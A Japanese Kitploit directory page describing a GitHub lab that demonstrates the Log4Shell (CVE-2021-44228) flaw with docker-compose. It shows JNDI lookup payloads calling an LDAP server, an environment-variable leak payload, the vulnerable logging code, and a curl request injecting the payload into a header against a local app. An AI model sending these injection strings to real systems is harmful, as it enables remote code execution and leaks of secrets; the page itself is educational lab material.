Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4j-cve-2021-44228-sample — このエクスプロイトの動作を示すサンプルdocker-composeセットアップ | Kitploit
ツール/GitHubGitHub/alpacamybags118/log4j-cve-2021-44228-sample
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubalpacamybags118/log4j-cve-2021-44228-sample

log4j-cve-2021-44228-sample

このエクスプロイトの動作を示すサンプルdocker-composeセットアップ

リポジトリを見る
24年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

log4jエクスプロイトの例

このリポジトリには、最近のlog4jエクスプロイトを悪用する動作サンプルが含まれています。実際のリモートコード実行は行いませんが、悪意のある攻撃者が脆弱なアプリケーションに自身のLDAPサーバへのコールを簡単に仕掛けられることを示しています。

このサンプルは、christophetd氏の優れたlog4j脆弱性アプリを利用しています: https://github.com/christophetd/log4shell-vulnerable-app

解説

この脆弱性は、log4jのlookup機能、特にjndiを悪用します。これにより、log4jは外部ホストからデータを取り込むためのルックアップを実行できます。これは、環境内の機密変数のログ出力からリモートコード実行まで、あらゆることに悪用される可能性があります。

ロガーが呼び出された際、${}で囲まれたテキストはすべてルックアップの対象となります。例えば、

root@kitploit:~
${jndi:ldap://someldapserver:1389/o=example}

は、指定されたクエリでそのLDAPサーバにルックアップを行い、結果を出力します。

jndiを使用しないが、それでも危険なより単純な例:

root@kitploit:~
${env:PASSWORD}

これは、その環境変数の内容をログに出力します。その後、そのログにアクセスできる者がアプリケーションの機密データを抽出できる可能性があります。

log4jコード

このエクスプロイトが悪用されるためのlog4jのコードは非常に単純です。リクエストのあるプロパティをサニタイズせずにログに記録するために、ロガーを呼び出すだけです。例えば、User-Agentの内容をログに記録できます。

root@kitploit:~
...
@GetMapping("/bad")
	public void Bad(@RequestHeader("User-Agent") String userAgent) {
    logger.info("Received User-Agent header " + userAgent);
	}

この例の使い方

まず、ローカルのLDAPサーバをビルドします:

root@kitploit:~
docker build -t ldapnode .

ビルドが完了したら、次のコマンドでスタック全体を起動します:

root@kitploit:~
docker-compose up

次に、x-api-versionヘッダを使用してルックアップを注入し、アプリにリクエストを送信します:

root@kitploit:~
curl --request GET \
  --url http://localhost:8080/ \
  --header 'x-api-version: ${jndi:ldap://bad:1389/o=example}'

このリクエストを使用すると、docker-composeのログにLDAPサーバが呼び出されたことが表示されます:

root@kitploit:~
bad_1    | ldap server has been called!
log4j_1  | 2021-12-14 02:43:11.657  INFO 1 --- [nio-8080-exec-2] HelloWorld                               : Received a request for API version com.sun.jndi.ldap.LdapCtx@201a609c

影響を受けた場合の対処方法

解決策については、こちらのドキュメントを参照してください。

ツールをダウンロード